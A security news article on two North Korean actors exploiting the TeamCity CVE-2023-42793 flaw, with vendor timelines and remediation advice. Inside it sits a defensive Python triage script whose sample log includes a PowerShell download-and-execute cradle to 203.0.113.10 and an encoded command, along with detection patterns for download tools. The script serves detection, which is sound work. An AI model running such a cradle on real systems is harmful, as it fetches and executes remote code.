Two North Korean nation-state actors known to commit supply chain attacks are exploiting a critical JetBrains TeamCity vulnerability, according to new research by Microsoft.
In a blog post Wednesday, Microsoft revealed that two North Korean threat actors, tracked as Diamond Sleet and Onyx Sleet, have been exploiting a remote code execution flaw, tracked as CVE-2023-42793, since early October. The vulnerability, which was assigned a CVSS score of 9.8, affects multiple versions of JetBrains TeamCity server and could allow an attacker to bypass authentication.
TeamCity is a continuous integration/continuous deployment (CI/CD) platform designed by Czech software vendor JetBrains for enterprise DevOps teams. JetBrains has more than 2 million customers worldwide, according to the company, including large enterprises such as United Airlines.
During attacks, Microsoft observed both threat actors leveraging unique sets of tools and techniques after successfully exploiting CVE-2023-42793. Some of the tools and malware were used to create backdoors to maintain persistent access to victim environments. Microsoft said it directly notified any targeted or compromised customers, though the scope of exploitation remains unknown.
However, based on previous activity, the actors could pose a widespread threat to the software supply chain. One example occurred in August when Microsoft said Diamond Sleet conducted a supply chain compromise of a German software provider.
"In past operations, Diamond Sleet and other North Korean threat actors have successfully carried out software supply chain attacks by infiltrating build environments. Given this, Microsoft assesses that this activity poses a particularly high risk to organizations who are affected," Microsoft wrote in the blog.
Previous Diamond Sleet targets observed by Microsoft included media, IT services and defense-related entities around the world. As for Onyx Sleet, the actor is known to exploit N-day vulnerabilities as an initial attack vector.
Olga Bedrina, TeamCity technical marketing writer, initially detailed the vulnerability disclosure timeline in a blog post last month. Software development platform Sonar reported the critical vulnerability to JetBrains on Sept. 6 and confirmed it only affected TeamCity On-Premises instances and not TeamCity cloud. JetBrains released a plugin as a workaround until a patch was available on Sept. 18. Customers received mitigation steps in an advisory on Sept. 21 and were urged to upgrade to the fixed version 2023.05.4.
On Sept. 27, Bedrina said all TeamCity On-Premises customers were notified about the vulnerability. She emphasized that the vulnerability could allow an attacker to gain administrative control of the TeamCity server.
Daniel Gallo, TeamCity solutions engineer, provided an update on Tuesday to address Microsoft's warnings. Microsoft notified JetBrains of exploitation activity by Diamond Sleet and Onyx Sleet on October 17. While Gallo's blog post did not confirm whether JetBrains observed the same exploitation and compromise that Microsoft did, he expanded on the threat activity to TechTarget Editorial.
"We have kept in close contact with our customers since the initial discovery and resolution of the CVE-2023-42793 vulnerability in TeamCity On-Premises to ensure they were aware of the serious nature of the issue. We also provided our customers with various options to mitigate the issue when we first released details of the vulnerability to our customer base on September 21, 2023," he wrote in an email to TechTarget Editorial.
"We are aware of a small number of TeamCity On-Premises customers who have since reached out to our support team over the previous weeks expressing concerns their environments may have been compromised due to the CVE-2023-42793 vulnerability. However, we are not aware if those customers have been compromised in the same way described by the Microsoft Threat Intelligence Center Team in their blog post. As TeamCity On-Premises is installed in environments maintained by our customers, we don't have visibility into how those environments are configured. Our SaaS offering (TeamCity Cloud) wasn't susceptible to this vulnerability, so [it] isn't impacted."
Gallo and Microsoft recommended updating to the fixed version of TeamCity and reviewing Microsoft's indicators of compromise. Microsoft also warned users to be aware of suspicious PowerShell downloads, which Diamond Sleet used following successful compromise of TeamCity servers.
Additionally, Microsoft urged users to "take immediate action to address malicious activity on the impacted device." If the nation-state actors launched malicious code, Microsoft said it's likely the attacker gained complete control of the device, so system isolation and credential resets are critical.
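The two recommendations above, upgrading to the fixed release and watching for suspicious PowerShell downloads on TeamCity hosts, can be turned into a small triage script. The following is an added example written for this article; it is not code from Microsoft, JetBrains or TechTarget. The process-creation log layout (`key=value` fields), the host names, IP address and command lines in the sample, the download-cradle regex, and the "spawned by java.exe" priority heuristic are all assumptions constructed for illustration, not Microsoft's published indicators of compromise.

```python
"""Triage helpers for the TeamCity CVE-2023-42793 guidance: version check plus a scan
of process-creation events for PowerShell download activity. Added example, not the
vendor's code; log format and indicator patterns are assumptions."""
import re
from typing import Dict, List

# Fixed release named in the JetBrains advisory; anything older still needs the upgrade.
FIXED_VERSION = (2023, 5, 4)  # 2023.05.4

# Constructed process-creation events in an assumed "key=value" layout (not a real
# product's log format). Hosts, the 203.0.113.10 address and command lines are illustrative.
SAMPLE_LOG = r"""
2023-10-18T09:12:03Z host=tc-build-01 parent=java.exe image=powershell.exe cmd=powershell.exe -nop -w hidden -c "IEX (New-Object Net.WebClient).DownloadString('http://203.0.113.10/x')"
2023-10-18T09:15:44Z host=tc-build-01 parent=explorer.exe image=powershell.exe cmd=powershell.exe Get-ChildItem C:\BuildAgent
2023-10-18T09:20:10Z host=tc-build-02 parent=java.exe image=powershell.exe cmd=powershell.exe -EncodedCommand SQBFAFgA
2023-10-18T09:22:51Z host=tc-build-02 parent=services.exe image=svchost.exe cmd=svchost.exe -k netsvcs
"""

LINE_RE = re.compile(
    r"^(?P<ts>\S+) host=(?P<host>\S+) parent=(?P<parent>\S+) image=(?P<image>\S+) cmd=(?P<cmd>.*)$"
)
# Generic PowerShell download-cradle indicators (assumed heuristics, not published IoCs).
DOWNLOAD_RE = re.compile(
    r"invoke-webrequest|\biwr\b|downloadstring|downloadfile|start-bitstransfer"
    r"|net\.webclient|\bcurl\b|\bwget\b",
    re.IGNORECASE,
)
# -e / -ec / -enc / -EncodedCommand: base64 payloads that hide the real command line.
ENCODED_RE = re.compile(r"(^|\s)-(e|ec|enc|encodedcommand)\s", re.IGNORECASE)
POWERSHELL_IMAGES = {"powershell.exe", "pwsh.exe"}


def parse_version(version: str) -> tuple:
    """'2023.05.4' -> (2023, 5, 4); missing trailing components are padded with 0."""
    parts = [int(p) for p in version.strip().split(".")]
    while len(parts) < 3:
        parts.append(0)
    return tuple(parts[:3])


def needs_upgrade(version: str) -> bool:
    """True when a TeamCity On-Premises version is older than the fixed 2023.05.4."""
    return parse_version(version) < FIXED_VERSION


def scan_process_log(text: str) -> List[Dict[str, object]]:
    """Return one finding per PowerShell process whose command line carries a download
    or encoded-command indicator. TeamCity runs on the JVM, so a PowerShell child of
    java.exe on a build server is ranked 'high' (an assumed heuristic)."""
    findings: List[Dict[str, object]] = []
    for lineno, raw in enumerate(text.strip().splitlines(), start=1):
        m = LINE_RE.match(raw.strip())
        if not m or m["image"].lower() not in POWERSHELL_IMAGES:
            continue
        cmd = m["cmd"]
        reasons = []
        if DOWNLOAD_RE.search(cmd):
            reasons.append("download cradle")
        if ENCODED_RE.search(cmd):
            reasons.append("encoded command")
        if not reasons:
            continue
        priority = "high" if m["parent"].lower() == "java.exe" else "medium"
        findings.append({
            "lineno": lineno, "ts": m["ts"], "host": m["host"],
            "parent": m["parent"], "reasons": reasons, "priority": priority,
        })
    return findings


if __name__ == "__main__":
    for ver in ("2023.05.3", "2023.05.4"):
        print(ver, "needs upgrade" if needs_upgrade(ver) else "fixed")
    for f in scan_process_log(SAMPLE_LOG):
        print(f"[{f['priority']}] line {f['lineno']} {f['host']} parent={f['parent']}: {', '.join(f['reasons'])}")
```

Running the script lists the two hits from the constructed log (the `DownloadString` cradle and the encoded command, both spawned by `java.exe`) and skips the benign `Get-ChildItem` invocation. In a real environment the command-line field would come from Sysmon event ID 1 or Windows Security event 4688 with command-line auditing enabled, and a hit on a TeamCity host should trigger the isolation and credential-reset steps Microsoft describes rather than just a log entry.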
TeamCity users who patched after early October may be at a higher risk of attacks, according to Gallo.
"If you upgraded your TeamCity server to 2023.05.4 or applied the security patch plugin since early October 2023, there is a higher probability that your TeamCity environment was already exploited prior to the implementation of any mitigation steps (since the North Korean nation-state threat actors have been observed exploiting this vulnerability since early October 2023)," Gallo wrote in the blog.
Arielle Waldman is a Boston-based reporter covering enterprise security news.